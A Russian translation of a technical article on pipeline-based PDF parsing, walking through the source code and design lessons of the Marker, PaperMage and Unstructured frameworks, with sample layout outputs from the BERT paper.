Этот сайт использует файлы cookies. Продолжая просмотр страниц сайта, вы соглашаетесь с использованием файлов cookies. Если вам нужна дополнительная информация, пожалуйста, посетите страницу Политика файлов Cookie

Прямой эфир

Русский

English

Войти / Регистрация

Cryptocurrencies: 9505 / Markets: 114717

Market Cap: $ 3 663 340 658 986 / 24h Vol: $ 222 537 540 211 / BTC Dominance: 58.861607907734%

Н Новости

[Перевод] Демистифицируем парсинг PDF: конвейерная обработка

Обзор, способы реализации и выводы

Преобразование неструктурированных документов, таких как PDF-файлы и отсканированные изображения, в структурированные или полуструктурированные форматы является важной составляющей искусственного интеллекта. Однако из-за замысловатой природы PDF-файлов и сложности задач, связанных с парсингом PDF, этот процесс не кажется на первый взгляд таким уж очевидным.

Этот цикл статей посвящен демистификации парсинга PDF. В предыдущей статье мы описали основную задачу парсинга PDF, классифицировали существующие методы и дали краткое описание каждого из них.

В этой статье мы сосредоточимся на конвейерном подходе. Мы начнем с обзора самого метода, затем продемонстрируем несколько стратегий по его реализации на примере готовых фреймворков, специализирующихся на этой задаче и, наконец, проанализируем полученные результаты.

Обзор

Конвейерный подход рассматривает задачу парсинга PDF-файлов как показано на рисунке 1.

Рисунок 1: Общий алгоритм конвейерного подхода. Изображение автора.

Конвейерный подход можно разделить на следующие пять этапов:

Предобработка PDF-файлов целью исправления таких проблем, как размытость или перекос в ориентации страниц. Этот этап включает в себя повышение качества изображения, коррекцию положения и т. д.
Проведение анализа макета, который можно разделить на два этапа: визуальный и семантический анализ структуры. Первый выявляет структуру документа и выделяет схожие области, а второй маркирует эти области определенными типами, такими как текст, заголовок, список, таблица, рисунок и т. д. На этом этапе также определяется порядок чтения страницы.
Отделение различных областей, выявленных в ходе анализа макета, друг от друга. Этот процесс включает в себя распознавание таблиц, текста и определение других компонентов, таких как формулы, блок-схемы и специальные символы.
Воспроизведение структуры страницы документа на основе полученных ранее результатов.
Вывод структурированной или полуструктурированной информации, например, в формате Markdown, JSON или HTML.

Теперь мы с вами рассмотрим несколько фреймворков для парсинга PDF. Таким образом мы сможем сформировать представление о конвейерном подходе и получить некоторые выводы, о которых мы поговорим в конце.

Marker

Marker — это конвейер на основе моделей глубокого обучения. Он способен конвертировать PDF-, EPUB- и MOBI-документы в формат Markdown.

Общий процесс

Как показано на рисунке 2, процесс работы с Marker разделен на следующие четыре этапа:

Рисунок 2: Конвейер Marker. Изображение автора.

Шаг 1: Для начала разделим страницы на блоки и извлечем текст с помощью PyMuPDF и OCR. Ниже приведен соответствующий код:

def convert_single_pdf(
        fname: str,
        model_lst: List,
        max_pages=None,
        metadata: Optional[Dict]=None,
        parallel_factor: int = 1
) -> Tuple[str, Dict]:
    ...
    ...
    doc = pymupdf.open(fname, filetype=filetype)
    if filetype != "pdf":
        conv = doc.convert_to_pdf()
        doc = pymupdf.open("pdf", conv)


    blocks, toc, ocr_stats = get_text_blocks(
        doc,
        tess_lang,
        spell_lang,
        max_pages=max_pages,
        parallel=int(parallel_factor * settings.OCR_PARALLEL_WORKERS)
    )

Шаг 2: Используем сегментатор макета, чтобы выделить отдельные блоки, и упорядочим их с помощью детектора колонок. Соответствующий код имеет вид:

def convert_single_pdf(
        fname: str,
        model_lst: List,
        max_pages=None,
        metadata: Optional[Dict]=None,
        parallel_factor: int = 1
) -> Tuple[str, Dict]:
    ...
    ...
    # Распаковка моделей из списка


    texify_model, layoutlm_model, order_model, edit_model = model_lst


    block_types = detect_document_block_types(
        doc,
        blocks,
        layoutlm_model,
        batch_size=int(settings.LAYOUT_BATCH_SIZE * parallel_factor)
    )


    # Поиск верхних и нижних колонтитулов


    bad_span_ids = filter_header_footer(blocks)
    out_meta["block_stats"] = {"header_footer": len(bad_span_ids)}


    annotate_spans(blocks, block_types)


    # Выгрузка отладочных данных, если установлены соответствующие флаги


    dump_bbox_debug_data(doc, blocks)


    blocks = order_blocks(
        doc,
        blocks,
        order_model,
        batch_size=int(settings.ORDERER_BATCH_SIZE * parallel_factor)
    )
    ...
    ...

Шаг 3: Отфильтруем верхние и нижние колонтитулы, исправим блоки с кодом и таблицами и применим модель Texify для формул. Соответствующий код выглядит следующим образом:

def convert_single_pdf(
        fname: str,
        model_lst: List,
        max_pages=None,
        metadata: Optional[Dict]=None,
        parallel_factor: int = 1
) -> Tuple[str, Dict]:
    ...
    ...
    # Исправляем блоки с кодом
    code_block_count = identify_code_blocks(blocks)
    out_meta["block_stats"]["code"] = code_block_count
    indent_blocks(blocks)


    # Исправляем таблицы
    merge_table_blocks(blocks)
    table_count = create_new_tables(blocks)
    out_meta["block_stats"]["table"] = table_count


    for page in blocks:
        for block in page.blocks:
            block.filter_spans(bad_span_ids)
            block.filter_bad_span_types()


    filtered, eq_stats = replace_equations(
        doc,
        blocks,
        block_types,
        texify_model,
        batch_size=int(settings.TEXIFY_BATCH_SIZE * parallel_factor)
    )
    out_meta["block_stats"]["equations"] = eq_stats
    ...
    ...

Шаг 4: Постобработка текста с помощью модели редактора. Соответствующий код:

def convert_single_pdf(
        fname: str,
        model_lst: List,
        max_pages=None,
        metadata: Optional[Dict]=None,
        parallel_factor: int = 1
) -> Tuple[str, Dict]:
    ...
    ...
    # Копирование во избежание изменения исходных данных
    merged_lines = merge_spans(filtered)
    text_blocks = merge_lines(merged_lines, filtered)
    text_blocks = filter_common_titles(text_blocks)
    full_text = get_full_text(text_blocks)


    # Обработка присоединяемых пустых блоков
    full_text = re.sub(r'\n{3,}', '\n\n', full_text)
    full_text = re.sub(r'(\n\s){3,}', '\n\n', full_text)


    # Меняем маркеры списка на -.
    full_text = replace_bullets(full_text)


    # Постобработка текста с помощью модели редактора
    full_text, edit_stats = edit_full_text(
        full_text,
        edit_model,
        batch_size=settings.EDITOR_BATCH_SIZE * parallel_factor
    )
    out_meta["postprocess_stats"] = {"edit": edit_stats}


    return full_text, out_meta

Выводы по Marker’у

Пока что мы лишь описали общий процесс работы Marker. Но нам уже есть, что обсудить — некоторые выводы, которые мы можем сделать на основе полученной информации.

Вывод 1: Анализ макета можно разделить на несколько подзадач. Первая подзадача включает в себя вызов API PyMuPDF для получения блоков страниц.

def ocr_entire_page(page, lang: str, spellchecker: Optional[SpellChecker] = None) -> List[Block]:
    if settings.OCR_ENGINE == "tesseract":
        return ocr_entire_page_tess(page, lang, spellchecker)
    elif settings.OCR_ENGINE == "ocrmypdf":
        return ocr_entire_page_ocrmp(page, lang, spellchecker)
    else:
        raise ValueError(f"Unknown OCR engine {settings.OCR_ENGINE}")




def ocr_entire_page_tess(page, lang: str, spellchecker: Optional[SpellChecker] = None) -> List[Block]:
    try:
        full_tp = page.get_textpage_ocr(flags=settings.TEXT_FLAGS, dpi=settings.OCR_DPI, full=True, language=lang)
        blocks = page.get_text("dict", sort=True, flags=settings.TEXT_FLAGS, textpage=full_tp)["blocks"]
        full_text = page.get_text("text", sort=True, flags=settings.TEXT_FLAGS, textpage=full_tp)


        if len(full_text) == 0:
            return []


        # Проверяем, сработал ли OCR. Если нет, то возвращаем пустой список


        # OCR может не сработать, если была отсканирована пустая страница нечетко отпечатанным текстом
        if detect_bad_ocr(full_text, spellchecker):
            return []
    except RuntimeError:
        return []
    return blocks

Вывод 2: Тонкая настройка (или дообучение) небольших мультимодальных предварительно обученных моделей, таких как LayoutLMv3, для решения конкретных задач может быть весьма полезна. Например, LayoutLMv3 в Marker дообучена таким образом, чтобы позволить модели сегментатора макета определять типы блоков.

def load_layout_model():
    model = LayoutLMv3ForTokenClassification.from_pretrained(
        settings.LAYOUT_MODEL_NAME,
        torch_dtype=settings.MODEL_DTYPE,
    ).to(settings.TORCH_DEVICE_MODEL)


    model.config.id2label = {
        0: "Caption",
        1: "Footnote",
        2: "Formula",
        3: "List-item",
        4: "Page-footer",
        5: "Page-header",
        6: "Picture",
        7: "Section-header",
        8: "Table",
        9: "Text",
        10: "Title"
    }


    model.config.label2id = {v: k for k, v in model.config.id2label.items()}
    return model

Набор данных, использованный для этого дообучения, был взят из открытого набора данных DocLayNet.

Вывод 3: При парсинге PDF-файлов огромное значение имеет число колонок на странице, т.к. от этого зависит порядок чтения документа. Алгоритм Marker также включает дообученую LayoutLMv3, которая представляет из себя модель детектора колонок. Эта модель определяет количество колонок на странице, а затем применяет метод средней точки,

def add_column_counts(doc, doc_blocks, model, batch_size):
    for i in range(0, len(doc_blocks), batch_size):
        batch = range(i, min(i + batch_size, len(doc_blocks)))
        rgb_images = []
        bboxes = []
        words = []
        for pnum in batch:
            page = doc[pnum]
            rgb_image, page_bboxes, page_words = get_inference_data(page, doc_blocks[pnum])
            rgb_images.append(rgb_image)
            bboxes.append(page_bboxes)
            words.append(page_words)


        predictions = batch_inference(rgb_images, bboxes, words, model)
        for pnum, prediction in zip(batch, predictions):
            doc_blocks[pnum].column_count = prediction




def order_blocks(doc, doc_blocks: List[Page], model, batch_size=settings.ORDERER_BATCH_SIZE):
    add_column_counts(doc, doc_blocks, model, batch_size)


    for page_blocks in doc_blocks:
        if page_blocks.column_count > 1:
            # Пересортировка блоков в зависимости от их позиции
            split_pos = page_blocks.x_start + page_blocks.width / 2
            left_blocks = []
            right_blocks = []
            for block in page_blocks.blocks:
                if block.x_start <= split_pos:
                    left_blocks.append(block)
                else:
                    right_blocks.append(block)
            page_blocks.blocks = left_blocks + right_blocks
    return doc_blocks

аналогично моему подходу в статье Advanced RAG 02: Unveiling PDF Parsing.

Вывод 4: Специализированные модели можно обучить обрабатывать математические формулы. Например, Texify, модель от Marker, использует архитектуру Donut. Она была обучена на модели Donut с использованием изображений из LaTex и соответствующих уравнений, взятых из интернета (включая набор данных im2latex). Обучение проводилось на 4-x A6000 в течение примерно двух дней, что соответствует примерно 6 эпохам.

Вывод 5: Модель также можно использовать для постобработки. Основная идея заключается в том, чтобы обучить модель T5 брать почти готовый текст и дорабатывать его, удаляя артефакты, добавляя пробелы и вставляя новые строки.

def load_editing_model():
    if not settings.ENABLE_EDITOR_MODEL:
        return None


    model = T5ForTokenClassification.from_pretrained(
            settings.EDITOR_MODEL_NAME,
            torch_dtype=settings.MODEL_DTYPE,
        ).to(settings.TORCH_DEVICE_MODEL)
    model.eval()


    model.config.label2id = {
        "equal": 0,
        "delete": 1,
        "newline-1": 2,
        "space-1": 3,
    }
    model.config.id2label = {v: k for k, v in   model.config.label2id.items()}
    return model

На сегодняшний это вся информация об обучении постпроцессора и конструировании набора данных, которую мне удалось найти.

Недостатки Marker

Естественно, у Marker есть свои недостатки:

Вместо обучения и тонкой настройки специализированной модели для анализа макета, здесь используется встроенная функция из PyMuPDF. Эффективность такого подхода вызывает сомнения.
Marker не всегда удается распознать таблицы, а также их названия, что уступает в эффективности, например, Nougat (решение на основе небольшой модели без OCR, которое будет подробно представлено в следующей статье). Например, на рисунке 3 представлены результаты распознавания таблицы 3 из статьи "Attention Is All You Need". Слева показана исходная таблица, в середине — результаты с использованием Marker, а справа — результаты Nougat.

Рисунок 3: Сравнение обнаружения и распознавания таблиц, исходная таблица — таблица 3 из статьи "Attention Is All You Need". Изображение автора.

Поддерживаются только языки, похожие на английский. Распарсить PDF-файл на таких языках, как японский и хинди, не получится.

PaperMage

Papermage — это фреймворк с открытым исходным кодом для анализа и обработки визуально насыщенных, структурированных научных документов. Он предоставляет четкие и интуитивно понятные абстракции для представления и манипулирования текстовыми и визуальными элементами в документе.

Papermage объединяет различные модели обработки естественного языка (NLP) и компьютерного зрения (CV) в единый фреймворк. Он предлагает готовые к использованию решения для распространенных сценариев обработки научных документов.

Далее мы расскажем о принципах работы PaperMage и обсудим общий процесс с примерами исходного кода. Затем мы поговорим о выводах, которые можно сделать при рассмотрении PaperMage.

Компоненты

В Papermage можно выделить три основных компонента:

Magelib: Библиотека, содержащая примитивы и методы для представления и манипулирования визуально насыщенными документами в виде мультимодальных структур.
Предикторы: Реализация, объединяющая различные современные модели анализа научных документов в единый интерфейс. Это возможно, даже не смотря на то, что отдельные модели могут быть написаны на разных фреймворках или работать в разных режимах.
Рецепты: Фреймворк предлагает хорошо протестированные комбинации отдельных модулей, часто одномодальных, образующих сложные и расширяемые мультимодальные конвейеры, если можно так выразиться, “под ключ”. Эти комбинации называются рецептами (Recipes).

Базовые классы данных

Magelib предоставляет три базовых класса данных для представления основных элементов визуально насыщенных структурированных документов: Document, Layers (слои) и Entities (сущности).

Документ и слои

На рисунке 4 показано, как PaperMage создает и представляет документы.

Рисунок 4: Как PaperMage создает и представляет документы. Источник: PaperMage.

После того, как с помощью различных алгоритмов и моделей извлечена структура документа, PaperMage концептуализирует ее как слой аннотаций, используемый для хранения как текстовой, так и визуальной информации.

Чуть позже мы посмотрим на исходный код и проанализируем процесс выполнения функции recipe.run().

Сущности

Как показано на рисунке 5, сущность представляет собой единицу мультимодального контента.

Рисунок 5: Сущность PaperMage. Источник: PaperMage.

Но что нам делать с прерывистыми элементами в документе, такими как, например, предложения, которые охватывают целые колонки или даже страницы, или, предположим, обрываются плавающими графиками или сносками?

PaperMage's использует две переменные-члена: спаны (spans) и боксы (boxes). Как показано на рисунке 5, спаны определяют текст предложения среди всех символов, а боксы отражают его визуальные координаты на странице. Такой подход обеспечивает большую гибкость, позволяя учитывать даже незначительные различия в макете.

Кроме того, мы имеем возможность обращаться к сущностям различными способами, как показано на рисунке 6.

Рисунок 6: Различные способы доступа к сущностям. Источник: PaperMage.

Чтобы лучше понять работу Papermage, мы начнем с конкретного примера парсинга PDF-файла и по ходу дела будем углубляться в суть процесса.

Общий анализ процесса и кода

Тестовый код выглядит следующим образом:

from papermage.recipes import CoreRecipe

core_recipe = CoreRecipe()

doc = core_recipe.run("YOUR_PDF_PATH")

Первым делом core_recipe = CoreRecipe() войдет в конструктор класса CoreRecipe, где произойдет инициализация связанных библиотек и моделей.

class CoreRecipe(Recipe):
    def __init__(
        self,
        ivila_predictor_path: str = "allenai/ivila-row-layoutlm-finetuned-s2vl-v2",
        bio_roberta_predictor_path: str = "allenai/vila-roberta-large-s2vl-internal",
        svm_word_predictor_path: str = "https://ai2-s2-research-public.s3.us-west-2.amazonaws.com/mmda/models/svm_word_predictor.tar.gz",
        dpi: int = 72,
    ):
        self.logger = logging.getLogger(self.__class__.__name__)
        self.dpi = dpi


        self.logger.info("Instantiating recipe...")
        self.parser = PDFPlumberParser()
        self.rasterizer = PDF2ImageRasterizer()


        # with warnings.catch_warnings():
        #     warnings.simplefilter("ignore")
        #     self.word_predictor = SVMWordPredictor.from_path(svm_word_predictor_path)


        self.publaynet_block_predictor = LPEffDetPubLayNetBlockPredictor.from_pretrained()
        self.ivila_predictor = IVILATokenClassificationPredictor.from_pretrained(ivila_predictor_path)
        self.sent_predictor = PysbdSentencePredictor()
        self.logger.info("Finished instantiating recipe")

Поскольку class Recipe является родительским классом CoreRecipe, функция core_recipe.run() перейдет в Recipe::run().

class Recipe:
    @abstractmethod
    def run(self, input: Any) -> Document:
        if isinstance(input, Path):
            if input.suffix == ".pdf":
                return self.from_pdf(pdf=input)
            if input.suffix == ".json":
                return self.from_json(doc=input)


            raise NotImplementedError("Filetype not yet supported.")


        if isinstance(input, Document):
            return self.from_doc(doc=input)


        if isinstance(input, str):
            if os.path.exists(input):
                input = Path(input)
                return self.run(input=input)
            else:
                return self.from_str(text=input)


        raise NotImplementedError("Document input not yet supported.")

Затем он дойдет до class CoreRecipe:: from_pdf() и class CoreRecipe:: from_doc():

class CoreRecipe(Recipe):
    ...
    ...
    def from_pdf(self, pdf: Path) -> Document:
        self.logger.info("Parsing document...")
        doc = self.parser.parse(input_pdf_path=pdf)


        self.logger.info("Rasterizing document...")
        images = self.rasterizer.rasterize(input_pdf_path=pdf, dpi=self.dpi)
        doc.annotate_images(images=list(images))
        self.rasterizer.attach_images(images=images, doc=doc)
        return self.from_doc(doc=doc)


    def from_doc(self, doc: Document) -> Document:
        # self.logger.info("Predicting words...")
        # words = self.word_predictor.predict(doc=doc)
        # doc.annotate_layer(name=WordsFieldName, entities=words)


        self.logger.info("Predicting sentences...")
        sentences = self.sent_predictor.predict(doc=doc)
        doc.annotate_layer(name=SentencesFieldName, entities=sentences)


        self.logger.info("Predicting blocks...")
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            blocks = self.publaynet_block_predictor.predict(doc=doc)
        doc.annotate_layer(name=BlocksFieldName, entities=blocks)


        self.logger.info("Predicting figures and tables...")
        figures = []
        tables = []
        for block in blocks:
            if block.metadata.type == "Figure":
                figure = Entity(boxes=block.boxes)
                figures.append(figure)
            elif block.metadata.type == "Table":
                table = Entity(boxes=block.boxes)
                tables.append(table)
        doc.annotate_layer(name=FiguresFieldName, entities=figures)
        doc.annotate_layer(name=TablesFieldName, entities=tables)


        # self.logger.info("Predicting vila...")
        vila_entities = self.ivila_predictor.predict(doc=doc)
        doc.annotate_layer(name="vila_entities", entities=vila_entities)


        for entity in vila_entities:
            entity.boxes = [
                Box.create_enclosing_box(
                    [b for t in doc.intersect_by_span(entity, name=TokensFieldName) for b in t.boxes]
                )
            ]
            # entity.text = make_text(entity=entity, document=doc)
        preds = group_by(entities=vila_entities, metadata_field="label", metadata_values_map=VILA_LABELS_MAP)
        doc.annotate(*preds)
        return doc

Общий процесс показан на рисунке 7:

Рисунок 7: Общий процесс работы PaperMage; стрелки без меток обозначают операцию слияния, также известную как функция аннотирования в PaperMage. Изображение автора.

На рисунке 7 мы можем увидеть, что процесс обработки PaperMage также представляет из себя конвейерный подход.

Первоначально выполняется анализ макета с помощью библиотеки PDFPlumber. Затем подключаются профессиональные алгоритмы и модели для анализа других объектов на странице, основываясь на результатах анализа макета. Сюда входят предложения, рисунки, таблицы, заголовки и так далее.

Далее мы сосредоточим наше внимание на трех важных процессах:

Разбиение на предложения
Анализ структуры макета
Анализ логической структуры.

Разбиение на предложения

Для разделения предложений используется PySBD — пакет Python для определения границ предложений на основе системы правил.

На вход подается последовательность лексем. На выходе мы получаем спан каждого предложения.

[
Unannotated Entity: {'spans': [[0, 212]]}, 
Unannotated Entity: {'spans': [[212, 367]]},  
…
]

Анализ структуры макета

Для анализа структуры макета страницы используется модель LPEffDetPubLayNetBlockPredictor. Это мощная модель обнаружения объектов на основе глубокого обучения, предоставляемая LayoutParser. Ее основная задача — сегментировать документ на области визуальных блоков.

На вход подается изображение страницы, обозначаемое как doc.images. На выходе мы получаем объект box и соответствующий тип для каждого блока. Бокс включает в себя координату X левой верхней вершины, координату Y левой верхней вершины, ширину, высоту и номер страницы.

[
Unannotated Entity: {'boxes': [[0.5179840190298606, 0.752760137345049, 0.3682081491355128, 0.15176369855069774, 0]], 'metadata': {'type': 'Text'}}, 
Unannotated Entity: {'boxes': [[0.5145780320135539, 0.5080924136055337, 0.3675624668198144, 0.23725746136663078, 0]], 'metadata': {'type': 'Text'}}, 
…
]

Анализ логической структуры

Для анализа логической структуры документа используется модель IVILATokenClassificationPredictor. Она разделяет документ на такие организационные единицы, как заголовок, аннотация, основная часть, сноски, подписи и т.д.

В качестве исходных данных используются данные на уровне страницы, передаваемые в виде словаря.

{
        'words': ['word1', 'word2', ...],
        'bbox': [[x1, y1, x2, y2], [x1, y1, x2, y2], ...],
        'block_ids': [0, 0, 0, 1 ...],
        'line_ids': [0, 1, 1, 2 ...],
        'labels': [0, 0, 0, 1 ...], # could be empty
    }

Выходные данные — спан каждой сущности.

[
Unannotated Entity: {'spans': [[0, 80]], 'metadata': {'label': 'Title'}}, 
Unannotated Entity: {'spans': [[81, 157]], 'metadata': {'label': 'Author'}}, 
Unannotated Entity: {'spans': [[158, 215]], 'metadata': {'label': 'Paragraph'}}, 
...
]

Размышления и выводы о PaperMage

Абстракция парсинга PDF

Абстракция, предложенная PaperMage для задачи парсинга PDF, является достаточно эффективной. Она предполагает разделение всего PDF на такие типы, как doc, layer и entities, что облегчает классификацию элементов и управление ими.

Масштабируемость

PaperMage разработала фреймворк, который легко расширяется, что упрощает последующую разработку.

Например, чтобы добавить пользовательский предиктор, нам достаточно наследоваться от базового класса BasePredictor и переопределить функцию _predict().

from .base_predictor import BasePredictor


class YOUR_NEW_Predictor(BasePredictor):
    ...
    ...
    def _predict(self, doc: Document) -> List[YOUR_RET_TYPE]:
    ...
    ...

Параллелизм

Рисунок 7 показывает, что у PaperMage есть потенциал для улучшения за счет распараллеливания, что является вполне целесообразным направлением для оптимизации.

Хотя текущая версия PaperMage не содержит кода, связанного с параллелизмом, добавление логики параллельной обработки может значительно повысить эффективность парсинга PDF-файлов.

Unstructured

Unstructured — это опенсорсный инструмент предварительной обработки неструктурированных данных. В предыдущей статье мы уже описали в общих чертах процесс его работы.

Теперь же мы поговорим о выводах, которые были сделаны при рассмотрении фреймворка unstructured, в частности о том, как он может помочь нам в разработке собственного инструмента для парсинга PDF.

Об анализе макета

Анализ макета в unstructured производится очень скрупулезно.

Если мы зададим strategy='hi_res', то для анализа макета будут использоваться такие модели, как YOLOX или detectron2. Для улучшения обнаружения они сочетаются с инструментом PDFMiner. Результаты обоих методов объединяются для получения окончательного макета, как показано на рисунке 8.

Рисунок 8: Процесс парсинга PDF со стратегией='hi_res' в unstructured. Изображение автора.

На рисунках 9 и 10 показаны визуализации результатов анализа макета 16-й страницы документа BERT; рамки на рисунке представляют границы каждой области. Результаты модели обнаружения объектов, показанные на рисунке 9, являются более точными. Таблицы и изображения в данном случае лучше интегрированы в структуру документа. Результаты обнаружения PDFMiner, показанные на рисунке 10, наоборот разделяют содержимое таблиц и изображений.

Рисунок 9: Визуализация результатов модели обнаружения объектов (inferred_layout) для 16-й страницы документа BERT, рамки представляют собой границы каждой области. Скриншот автора.

Рисунок 10: Визуализация результатов обнаружения PDFMiner (extracted_layout) для 16-й страницы документа BERT, рамки представляют собой границы каждой области. Скриншот автора.

Код, отвечающий за слияния макетов, выглядит следующим образом: он содержит двойной цикл, который оценивает связь между каждой областью обнаруженной с помощью PDFMiner (extracted_layout) и результатом, полученным от модели обнаружения объектов (inferred_layout), а затем решает, нужно ли их объединять.

def merge_inferred_layout_with_extracted_layout(
    inferred_layout: Collection[LayoutElement],
    extracted_layout: Collection[TextRegion],
    page_image_size: tuple,
    same_region_threshold: float = inference_config.LAYOUT_SAME_REGION_THRESHOLD,
    subregion_threshold: float = inference_config.LAYOUT_SUBREGION_THRESHOLD,
) -> List[LayoutElement]:
    """Merge two layouts to produce a single layout."""
    extracted_elements_to_add: List[TextRegion] = []
    inferred_regions_to_remove = []
    w, h = page_image_size
    full_page_region = Rectangle(0, 0, w, h)
    for extracted_region in extracted_layout:
        extracted_is_image = isinstance(extracted_region, ImageTextRegion)
        if extracted_is_image:
            # Для наших целей мы пропустим извлеченные изображения, у нас нет текста на них, и с ними
            # обычно трудно получить хорошие ограничительные рамки для текста.


            is_full_page_image = region_bounding_boxes_are_almost_the_same(
                extracted_region.bbox,
                full_page_region,
                FULL_PAGE_REGION_THRESHOLD,
            )


            if is_full_page_image:
                continue
        region_matched = False
        for inferred_region in inferred_layout:
            if inferred_region.source in CHIPPER_VERSIONS:
                continue
            ...
            ...

О кастомизации

Unstructured предоставляет множество промежуточных результатов, которые можно легко кастомизировать.

В предыдущей статье мы рассмотрели три проблемы, связанные с данными, получемыми от unstructed:

Парсинг таблиц
Перестановка обнаруженных блоков, особенно в PDF-файлах с двумя колонками
Извлечение многоуровневых заголовков

Последние две проблемы можно решить, изменив промежуточную структуру. В качестве примера на рисунке 11 показан окончательный макет второй страницы документа BERT.

Рисунок 11: Визуализация окончательного макета второй страницы документа BERT. Скриншот автора.

В то же время мы можем легко получить доступные результаты анализа макета:

[


LayoutElement(bbox=Rectangle(x1=851.1539916992188, y1=181.15073777777613, x2=1467.844970703125, y2=587.8204599999975), text='These approaches have been generalized to coarser granularities, such as sentence embed- dings (Kiros et al., 2015; Logeswaran and Lee, 2018) or paragraph embeddings (Le and Mikolov, 2014). To train sentence representations, prior work has used objectives to rank candidate next sentences (Jernite et al., 2017; Logeswaran and Lee, 2018), left-to-right generation of next sen- tence words given a representation of the previous sentence (Kiros et al., 2015), or denoising auto- encoder derived objectives (Hill et al., 2016). ', source=<Source.YOLOX: 'yolox'>, type='Text', prob=0.9519357085227966, image_path=None, parent=None), 


LayoutElement(bbox=Rectangle(x1=196.5296173095703, y1=181.1507377777777, x2=815.468994140625, y2=512.548237777777), text='word based only on its context. Unlike left-to- right language model pre-training, the MLM ob- jective enables the representation to fuse the left and the right context, which allows us to pre- In addi- train a deep bidirectional Transformer. tion to the masked language model, we also use a “next sentence prediction” task that jointly pre- trains text-pair representations. The contributions of our paper are as follows: ', source=<Source.YOLOX: 'yolox'>, type='Text', prob=0.9517233967781067, image_path=None, parent=None), 


LayoutElement(bbox=Rectangle(x1=200.22352600097656, y1=539.1451822222216, x2=825.0242919921875, y2=870.542682222221), text='• We demonstrate the importance of bidirectional pre-training for language representations. Un- like Radford et al. (2018), which uses unidirec- tional language models for pre-training, BERT uses masked language models to enable pre- trained deep bidirectional representations. This is also in contrast to Peters et al. (2018a), which uses a shallow concatenation of independently trained left-to-right and right-to-left LMs. ', source=<Source.YOLOX: 'yolox'>, type='List-item', prob=0.9414362907409668, image_path=None, parent=None), 


LayoutElement(bbox=Rectangle(x1=851.8727416992188, y1=599.8257377777753, x2=1468.0499267578125, y2=1420.4982377777742), text='ELMo and its predecessor (Peters et al., 2017, 2018a) generalize traditional word embedding re- search along a different dimension. They extract context-sensitive features from a left-to-right and a right-to-left language model. The contextual rep- resentation of each token is the concatenation of the left-to-right and right-to-left representations. When integrating contextual word embeddings with existing task-speciﬁc architectures, ELMo advances the state of the art for several major NLP benchmarks (Peters et al., 2018a) including ques- tion answering (Rajpurkar et al., 2016), sentiment analysis (Socher et al., 2013), and named entity recognition (Tjong Kim Sang and De Meulder, 2003). Melamud et al. (2016) proposed learning contextual representations through a task to pre- dict a single word from both left and right context using LSTMs. Similar to ELMo, their model is feature-based and not deeply bidirectional. Fedus et al. (2018) shows that the cloze task can be used to improve the robustness of text generation mod- els. ', source=<Source.YOLOX: 'yolox'>, type='Text', prob=0.938507616519928, image_path=None, parent=None), 




LayoutElement(bbox=Rectangle(x1=199.3734130859375, y1=900.5257377777765, x2=824.69873046875, y2=1156.648237777776), text='• We show that pre-trained representations reduce the need for many heavily-engineered task- speciﬁc architectures. BERT is the ﬁrst ﬁne- tuning based representation model that achieves state-of-the-art performance on a large suite of sentence-level and token-level tasks, outper- forming many task-speciﬁc architectures. ', source=<Source.YOLOX: 'yolox'>, type='List-item', prob=0.9461237788200378, image_path=None, parent=None), 


LayoutElement(bbox=Rectangle(x1=195.5695343017578, y1=1185.526123046875, x2=815.9393920898438, y2=1330.3272705078125), text='• BERT advances the state of the art for eleven NLP tasks. The code and pre-trained mod- els are available at https://github.com/ google-research/bert. ', source=<Source.YOLOX: 'yolox'>, type='List-item', prob=0.9213815927505493, image_path=None, parent=None), 


LayoutElement(bbox=Rectangle(x1=195.33956909179688, y1=1360.7886962890625, x2=447.47264000000007, y2=1397.038330078125), text='2 Related Work ', source=<Source.YOLOX: 'yolox'>, type='Section-header', prob=0.8663332462310791, image_path=None, parent=None), 


LayoutElement(bbox=Rectangle(x1=197.7477264404297, y1=1419.3353271484375, x2=817.3308715820312, y2=1527.54443359375), text='There is a long history of pre-training general lan- guage representations, and we brieﬂy review the most widely-used approaches in this section. ', source=<Source.YOLOX: 'yolox'>, type='Text', prob=0.928022563457489, image_path=None, parent=None), 


LayoutElement(bbox=Rectangle(x1=851.0028686523438, y1=1468.341394166663, x2=1420.4693603515625, y2=1498.6444497222187), text='2.2 Unsupervised Fine-tuning Approaches ', source=<Source.YOLOX: 'yolox'>, type='Section-header', prob=0.8346447348594666, image_path=None, parent=None), 


LayoutElement(bbox=Rectangle(x1=853.5444444444446, y1=1526.3701822222185, x2=1470.989990234375, y2=1669.5843488888852), text='As with the feature-based approaches, the ﬁrst works in this direction only pre-trained word em- (Col- bedding parameters from unlabeled text lobert and Weston, 2008). ', source=<Source.YOLOX: 'yolox'>, type='Text', prob=0.9344717860221863, image_path=None, parent=None), 


LayoutElement(bbox=Rectangle(x1=200.00000000000009, y1=1556.2037353515625, x2=799.1743774414062, y2=1588.031982421875), text='2.1 Unsupervised Feature-based Approaches ', source=<Source.YOLOX: 'yolox'>, type='Section-header', prob=0.8317819237709045, image_path=None, parent=None), 


LayoutElement(bbox=Rectangle(x1=198.64227294921875, y1=1606.3146266666645, x2=815.2886352539062, y2=2125.895459999998), text='Learning widely applicable representations of words has been an active area of research for decades, including non-neural (Brown et al., 1992; Ando and Zhang, 2005; Blitzer et al., 2006) and neural (Mikolov et al., 2013; Pennington et al., 2014) methods. Pre-trained word embeddings are an integral part of modern NLP systems, of- fering signiﬁcant improvements over embeddings learned from scratch (Turian et al., 2010). To pre- train word embedding vectors, left-to-right lan- guage modeling objectives have been used (Mnih and Hinton, 2009), as well as objectives to dis- criminate correct from incorrect words in left and right context (Mikolov et al., 2013). ', source=<Source.YOLOX: 'yolox'>, type='Text', prob=0.9450697302818298, image_path=None, parent=None), 


LayoutElement(bbox=Rectangle(x1=853.4905395507812, y1=1681.5868488888855, x2=1467.8729248046875, y2=2125.8954599999965), text='More recently, sentence or document encoders which produce contextual token representations have been pre-trained from unlabeled text and ﬁne-tuned for a supervised downstream task (Dai and Le, 2015; Howard and Ruder, 2018; Radford et al., 2018). The advantage of these approaches is that few parameters need to be learned from scratch. At least partly due to this advantage, OpenAI GPT (Radford et al., 2018) achieved pre- viously state-of-the-art results on many sentence- level tasks from the GLUE benchmark (Wang language model- Left-to-right et al., 2018a). ', source=<Source.YOLOX: 'yolox'>, type='Text', prob=0.9476840496063232, image_path=None, parent=None)


]

Используя приведенную выше информацию, мы можем легко выполнять такие задачи, как сортировка и извлечение многоуровневых заголовков.

